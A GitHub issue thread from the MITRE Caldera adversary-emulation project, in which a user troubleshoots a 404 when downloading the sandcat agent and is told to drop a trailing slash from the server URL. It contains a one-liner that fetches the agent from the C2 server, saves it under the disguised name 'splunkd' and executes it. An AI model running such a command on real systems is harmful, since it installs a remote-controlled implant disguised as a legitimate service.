### ISSUE TITLE
payload download is 404

### ISSUE THREAD

**Issue by iiiusky** [mitre/caldera#2141]
After I installed it according to the official manual, and then started the service, there was a line of log print output during the service startup

```
2021-04-29 18:42:41-WARNING (data_svc.py:369 _verify_abilities) Payload referenced in b1d41972-3ad9-4aa1-8f7f-05f049a2980e but not found: sandcat.go
```

Then I execute a command similar to the following

```
server="http://10.10.10.93:8888/";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download> splunkd;chmod +x splunkd ;./splunkd -server $server -group red -v
```

But the download was not successful, because the content of the downloaded file is 404

**Comment by iiiusky** [comment]
I installed and deployed according to the manual document

**Comment by armellin** [comment]
Try to drop the last slash in the server assignment: server="http://10.10.10.93:8888", instead of server="http://10.10.10.93:8888/"

**Comment by iiiusky** [comment]
> Try to drop the last slash in the server assignment: server="http://10.10.10.93:8888", instead of server="http://10.10.10.93:8888/"

This is an effective solution！！！
